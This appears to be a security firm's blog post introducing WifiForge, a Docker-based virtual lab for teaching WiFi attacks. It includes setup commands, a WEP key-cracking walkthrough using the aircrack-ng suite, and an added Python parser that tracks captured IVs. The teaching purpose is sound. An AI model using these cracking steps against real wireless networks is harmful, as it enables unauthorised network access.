WifiForge – WiFi Exploitation for the Classroom

by William Oldert // BHIS Intern

BHIS had a problem.  

We needed an environment for students to learn WiFi hacking safely. Our original solution used interconnected physical network gear and computers to create the needed signals. Running a class properly required multiple such setups, however, which was costly, and transporting them was a concern as well.  

We discovered a program called Mininet, which creates an interactive virtual network, and began looking for ways to use it in labs and teaching material. Wondering whether this might be the solution we were in sore need of, we started a project and hired a team of interns to research and test its limits. 

The product of that project is WifiForge. 

What is WifiForge? 

WifiForge is a program built on the foundation of the open-source Mininet-Wifi, itself a fork of Mininet that adds support for wireless networking. It automatically sets up the network and tools needed to perform a variety of exploits, all packed neatly into a Docker container. WifiForge eliminates the need for physical hardware, requiring only a Docker install and the execution of a couple of commands. 

You can find a link to the project’s GitHub page HERE.  

Disclaimer/Notes 

  • While it is strongly recommended to run WifiForge in a Docker container, you can run it on your base machine. 
  • Installing Mininet-Wifi on the base machine has been known to cause dependency nightmares. 
  • It is suggested to run WifiForge on Ubuntu version 14.04 and up or the latest version of Kali (when Mininet was built in 2017, Ubuntu 14.04 was bleeding edge).  
  • The WifiForge installation script may disrupt normal operating system use; it is suggested to use a fresh install, virtual machine, or preferably a Docker container. 

OS Compatibility 

WifiForge should work on any Linux operating system using Docker. The following operating systems have been tested and are confirmed to work. 

  • Kali Linux 
  • Parrot OS 
  • Ubuntu 

Set-Up Guide 

Below is the guide to setting up a Docker container with all the required pieces and parts. We have guides for installing to a bare OS or from a Docker image. These instructions can be found on the project’s GitHub. The best and easiest option, however, is laid out below. 

Docker (recommended) 

Note: the Dockerfile build will fail if Mininet-Wifi is already installed locally. 

Install from release 

  1. Pull the Docker image from Dockerhub and start a new container. 

sudo docker run --privileged=true -it --env="DISPLAY" --env="QT_X11_NO_MITSHM=1" -v /tmp/.X11-unix:/tmp/.X11-unix:rw -v /sys/:/sys -v /lib/modules/:/lib/modules/ --name mininet-wifi --network=host --hostname mininet-wifi redblackbird/wififorge:v1.0.0 /bin/bash

  2. Within the container, initiate the controller to simulate APs. 

service openvswitch-switch start

  3. Run WifiForge.py. 

sudo python3 Framework/WifiForge.py

Labs and Featured Tools

WifiForge provides pre-built labs that cover a variety of topics and tools including, but not limited to:

Today, however, we would like to give you a taste of what this program can do through our WEP key-cracking lab.

Lab: WEP Key Cracking

Setup Phase

To begin, select “WEP Network” from the WifiForge menu and allow up to 30 seconds for initialization of the network.

Once it has started, use the following command to open an xterm session on the attacker, host1, and host2.

xterm a host1 host2 

WEP Key Cracking

On the attacking machine, switch the interface to monitor mode using the following command.

airmon-ng start a-wlan0 

Successful output of the above command will appear as below.

Use airodump-ng to begin looking for nearby networks.

airodump-ng a-wlan0mon 

Wait for traffic to appear on the console as seen below.

Note the BSSID and channel before killing the process with ‘Ctrl + c’. Use this BSSID and channel in the next command.

airodump-ng -c <CHANNEL> --bssid <BSSID> a-wlan0mon -w attack_capture 

As the above command runs, information regarding hosts connected to the target network will appear as seen below.

On host1, note the IP address associated with host1-wlan0 after running the following command.

ifconfig

The IP address can be seen highlighted in red in the screenshot below.

The WEP key will be cracked by collecting regular user traffic. To simulate this traffic, use the following command on host1.

iperf -s

The above command will begin listening on port 5001 for traffic, as seen below.

Switch over to host2’s terminal. Run the following command.

iperf -c <HOST1 IP ADDRESS> -u -b 100M -t 60

The above command will begin sending traffic to host1. The output will be similar to the image below.

Wait until about 25,000 packets have been sent (see the Frames column in the airodump-ng console on the attacker). When this number is reached, stop the airodump-ng capture on the attacker machine using ‘Ctrl + c’ and run the following command.

aircrack-ng ./attack_capture-01.cap

The above command will begin attempting to crack the WEP key. Successful recovery of the key will look similar to the screenshot below.
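As an added example (not part of the original post or of the WifiForge project), here is a small Python parser for the CSV that airodump-ng writes beside the .cap when run with "-w attack_capture" (attack_capture-01.csv). It lets a student check from a script whether the lab's WEP network has reached the 25,000-frame threshold used above, and flags any WEP network as weak; the sample CSV contents, BSSIDs and ESSIDs are constructed for this example.

```python
import csv
import io

# Constructed sample of an airodump-ng CSV: an AP section, a blank line,
# then a station section (same column layout airodump-ng uses).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, WEP, WEP, OPN,  -30,      120,    26410,   0.  0.  0.  0,   7, wepnet , 
02:00:00:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK,  -45,       80,        0,   0.  0.  0.  0,   6, office , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:01:01, 2024-01-01 10:00:10, 2024-01-01 10:05:00,  -35,    26500, 02:00:00:00:00:01,
"""


def parse_access_points(text):
    """Return the AP rows (the section before 'Station MAC') as dicts
    keyed by the stripped header names, e.g. 'BSSID', 'channel', '# IV'."""
    ap_section = text.split("\nStation MAC")[0]
    header = None
    rows = []
    for fields in csv.reader(io.StringIO(ap_section)):
        fields = [f.strip() for f in fields]
        if not any(fields):          # skip blank separator lines
            continue
        if header is None:
            header = fields
            continue
        rows.append(dict(zip(header, fields)))
    return rows


def wep_capture_status(rows, needed_ivs=25000):
    """For every WEP network seen, report its BSSID/channel, the IV count
    airodump-ng has logged so far, and whether the lab threshold is met.
    Any entry in this list is a network using a broken cipher suite."""
    report = []
    for ap in rows:
        if ap["Privacy"] != "WEP":
            continue
        ivs = int(ap["# IV"])
        report.append({
            "bssid": ap["BSSID"],
            "channel": int(ap["channel"]),
            "essid": ap["ESSID"],
            "ivs": ivs,
            "ready": ivs >= needed_ivs,
        })
    return report


if __name__ == "__main__":
    for entry in wep_capture_status(parse_access_points(SAMPLE_CSV)):
        print(entry)
```

Point it at the real attack_capture-01.csv by reading that file into the string passed to parse_access_points; the "# IV" column is what aircrack-ng consumes, so it is the more precise number to watch than the per-station frame count.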

To Close…

Hopefully, this lab helped to demonstrate the usefulness of WifiForge to the reader and showcase what it can be used to accomplish. Being able to spin up an environment for a class, without having to deal with the setup or any of the behind-the-scenes work, is why we built this program. Not having to dink around with hardware is a big plus too. All this in a compact Docker container means portability and scaling are not a problem either.

And, of course, WifiForge, as intended, solves BHIS’s problem quite handily.
